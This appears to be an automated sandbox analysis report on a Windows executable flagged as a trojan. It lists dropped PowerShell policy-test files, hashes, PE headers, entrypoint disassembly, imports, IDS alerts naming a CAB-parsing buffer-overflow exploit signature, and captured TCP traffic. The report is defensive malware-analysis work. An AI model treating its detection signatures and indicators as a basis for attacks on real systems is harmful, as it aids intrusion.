                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_pecys42p.wqc.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_sokqxsk3.dwn.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_sxg35hvy.lr2.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_wzlnjj4k.xig.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_xwzect01.vzr.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_z1rs4ztt.yw0.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_zk5q5kau.idj.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                General

                                                                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Entropy (8bit):6.5488566357801465
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                File name:SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
                                                                                                                                                                                                File size:1'694'720 bytes
                                                                                                                                                                                                MD5:d4e3a11d9468375f793c4c5c2504a374
                                                                                                                                                                                                SHA1:6dc95fc874fcadac1fc135fd521eddbdcb63b1c6
                                                                                                                                                                                                SHA256:0dc03de0ec34caca989f22de1ad61e7bd6bc1eabc6f993dbed2983f4cc33923d
                                                                                                                                                                                                SHA512:9d87f182f02daafad9b21f8a0f5a0eeedb277f60aa2d21bb8eb660945c153503db35821562f12b82a4e84cef848f1b1391c116ff30606cb495cf2e8ce4634217
                                                                                                                                                                                                SSDEEP:49152:yic0Ug34MNv4Kwu3zuSTQP76Nuudqx7eY1wn8mZ:0FcbTQP76Nuudqxkn
                                                                                                                                                                                                TLSH:34759D56B3E401F8E1A7C138C9574A1BE7B2B855036097DF03A486662F23BE16F3E761
                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iO...!@..!@..!@..$Ad.!@..%A..!@.."A..!@.."A..!@..%A..!@..$A..!@.. A..!@.. @..!@..(A..!@...@..!@..#A..!@Rich..!@........PE..d..

                                                                                                                                                                                                File Icon

                                                                                                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                General

                                                                                                                                                                                                Entrypoint:0x1400139d0
                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                Time Stamp:0x6727FDAF [Sun Nov 3 22:48:15 2024 UTC]
                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                Import Hash:c5f00a6fe8c8d189216e47cc0bff8748

                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                Instruction
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                call 00007F556CB6B37Ch
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                jmp 00007F556CB6A8DFh
                                                                                                                                                                                                int3
                                                                                                                                                                                                int3
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                dec ebp
                                                                                                                                                                                                mov eax, dword ptr [ecx+38h]
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                mov ecx, edx
                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                mov edx, ecx
                                                                                                                                                                                                call 00007F556CB6AA72h
                                                                                                                                                                                                mov eax, 00000001h
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                ret
                                                                                                                                                                                                int3
                                                                                                                                                                                                int3
                                                                                                                                                                                                int3
                                                                                                                                                                                                inc eax
                                                                                                                                                                                                push ebx
                                                                                                                                                                                                inc ebp
                                                                                                                                                                                                mov ebx, dword ptr [eax]
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                mov ebx, edx
                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                and ebx, FFFFFFF8h
                                                                                                                                                                                                dec esp
                                                                                                                                                                                                mov ecx, ecx
                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                test byte ptr [eax], 00000004h
                                                                                                                                                                                                dec esp
                                                                                                                                                                                                mov edx, ecx
                                                                                                                                                                                                je 00007F556CB6AA75h
                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                mov eax, dword ptr [eax+08h]
                                                                                                                                                                                                dec ebp
                                                                                                                                                                                                arpl word ptr [eax+04h], dx
                                                                                                                                                                                                neg eax
                                                                                                                                                                                                dec esp
                                                                                                                                                                                                add edx, ecx
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                arpl ax, cx
                                                                                                                                                                                                dec esp
                                                                                                                                                                                                and edx, ecx
                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                arpl bx, ax
                                                                                                                                                                                                dec edx
                                                                                                                                                                                                mov edx, dword ptr [eax+edx]
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                mov eax, dword ptr [ebx+10h]
                                                                                                                                                                                                mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                mov eax, dword ptr [ebx+08h]
                                                                                                                                                                                                test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                                                                je 00007F556CB6AA6Dh
                                                                                                                                                                                                movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                                                                and eax, FFFFFFF0h
                                                                                                                                                                                                dec esp
                                                                                                                                                                                                add ecx, eax
                                                                                                                                                                                                dec esp
                                                                                                                                                                                                xor ecx, edx
                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                mov ecx, ecx
                                                                                                                                                                                                pop ebx
                                                                                                                                                                                                jmp 00007F556CB6A6E6h
                                                                                                                                                                                                int3
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                mov dword ptr [esp+10h], ebx
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                mov dword ptr [esp+18h], esi
                                                                                                                                                                                                push ebp
                                                                                                                                                                                                push edi
                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                push esi
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                sub esp, 10h
                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                cpuid
                                                                                                                                                                                                inc esp
                                                                                                                                                                                                mov eax, ecx
                                                                                                                                                                                                inc esp
                                                                                                                                                                                                mov edx, edx
                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                xor edx, 49656E69h
                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                xor eax, 6C65746Eh
                                                                                                                                                                                                inc esp
                                                                                                                                                                                                mov ecx, ebx
                                                                                                                                                                                                inc esp
                                                                                                                                                                                                mov esi, eax
                                                                                                                                                                                                xor ecx, ecx

                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x19985c0x28.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a20000x1e0.rsrc
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x19e0000x285c.pdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a30000x984.reloc
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x194a400x38.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1949000x140.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x2e0000x2b0.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                Sections

                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                .text0x10000x2c9f40x2ca003eaa18591f27f44185d8b5b5f0e3c9d0False0.5290999212184874data6.487587820875137IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .rdata0x2e0000x16c1560x16c200021218e8e2f72417a24aa2fb7db09861False0.4839552759182973data6.542474160978796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .data0x19b0000x2b280x14008011fd480e967751b06b13543764e907False0.183984375DOS executable (block device driver)3.045131551850154IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .pdata0x19e0000x285c0x2a00cbf1a6a006904473afc52a57a282369aFalse0.4675409226190476data5.350122810230798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .fptable0x1a10000x1000x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .rsrc0x1a20000x1e00x200fe464930c0f6ab8cb6c8d3c7dcb0d98cFalse0.52734375data4.704363013479242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .reloc0x1a30000x9840xa005f205b7170b58890946c62ed249f89d5False0.515234375data5.348493313637984IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                Resources

                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                RT_MANIFEST0x1a20600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                Imports

                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                KERNEL32.dllGetModuleHandleExW, GetModuleFileNameW, MultiByteToWideChar, CloseHandle, CreateProcessW, WideCharToMultiByte, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetStringTypeW, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, ExitProcess, GetFileSizeEx, SetFilePointerEx, GetFileType, HeapAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, VirtualProtect, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, CreateFileW, HeapSize, WriteConsoleW, RtlUnwind

                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                2024-11-05T10:46:18.886535+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.549721TCP
                                                                                                                                                                                                2024-11-05T10:46:58.151307+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.552819TCP

                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Nov 5, 2024 10:46:00.057029963 CET49706443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:00.057112932 CET44349706140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:00.057218075 CET49706443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:00.070614100 CET49706443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:00.070632935 CET44349706140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:00.920588970 CET44349706140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:00.920841932 CET49706443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:01.777066946 CET49706443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:01.777182102 CET44349706140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:01.777257919 CET49706443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:06.788820982 CET49712443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:06.788886070 CET44349712140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:06.788964987 CET49712443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:06.789455891 CET49712443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:06.789465904 CET44349712140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:07.647299051 CET44349712140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:07.647475004 CET49712443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:07.649360895 CET49712443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:07.649379969 CET44349712140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:07.649677038 CET44349712140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:07.653187990 CET49712443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:07.699332952 CET44349712140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:08.026182890 CET44349712140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:08.028763056 CET44349712140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:08.028853893 CET44349712140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:08.028876066 CET49712443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:08.028901100 CET49712443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:08.029329062 CET49712443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:08.029345036 CET44349712140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:08.041213989 CET49715443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:08.041258097 CET44349715185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:08.041347980 CET49715443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:08.041802883 CET49715443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:08.041815042 CET44349715185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:08.649842978 CET44349715185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:08.650000095 CET49715443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:08.654438972 CET49715443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:08.654450893 CET44349715185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:08.654706955 CET44349715185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:08.655436993 CET49715443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:08.703336954 CET44349715185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:09.170608044 CET44349715185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:09.170677900 CET44349715185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:09.170742035 CET49715443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:09.173669100 CET49715443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:09.173683882 CET44349715185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:09.190371037 CET49716443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:09.190409899 CET44349716140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:09.190531969 CET49716443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:09.190927029 CET49716443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:09.190942049 CET44349716140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:10.042481899 CET44349716140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:10.052406073 CET49716443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:10.052424908 CET44349716140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:10.052552938 CET49716443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:10.052557945 CET44349716140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:10.300137043 CET44349716140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:10.300420046 CET44349716140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:10.300474882 CET49716443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:10.300477982 CET44349716140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:10.300586939 CET49716443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:10.300895929 CET49716443192.168.2.5140.82.121.4
                                                                                                                                                                                                Nov 5, 2024 10:46:10.300909042 CET44349716140.82.121.4192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:10.320102930 CET49717443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:10.320137024 CET44349717185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:10.321976900 CET49717443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:10.323422909 CET49717443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:10.323438883 CET44349717185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:10.961179972 CET44349717185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:10.962287903 CET49717443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:10.962311029 CET44349717185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:10.962404966 CET49717443192.168.2.5185.199.110.133
                                                                                                                                                                                                Nov 5, 2024 10:46:10.962409973 CET44349717185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:11.092346907 CET44349717185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:11.092444897 CET44349717185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:11.092487097 CET44349717185.199.110.133192.168.2.5
                                                                                                                                                                                                Nov 5, 2024 10:46:11.092523098 CET44349717185.199.110.133192.168.2.5
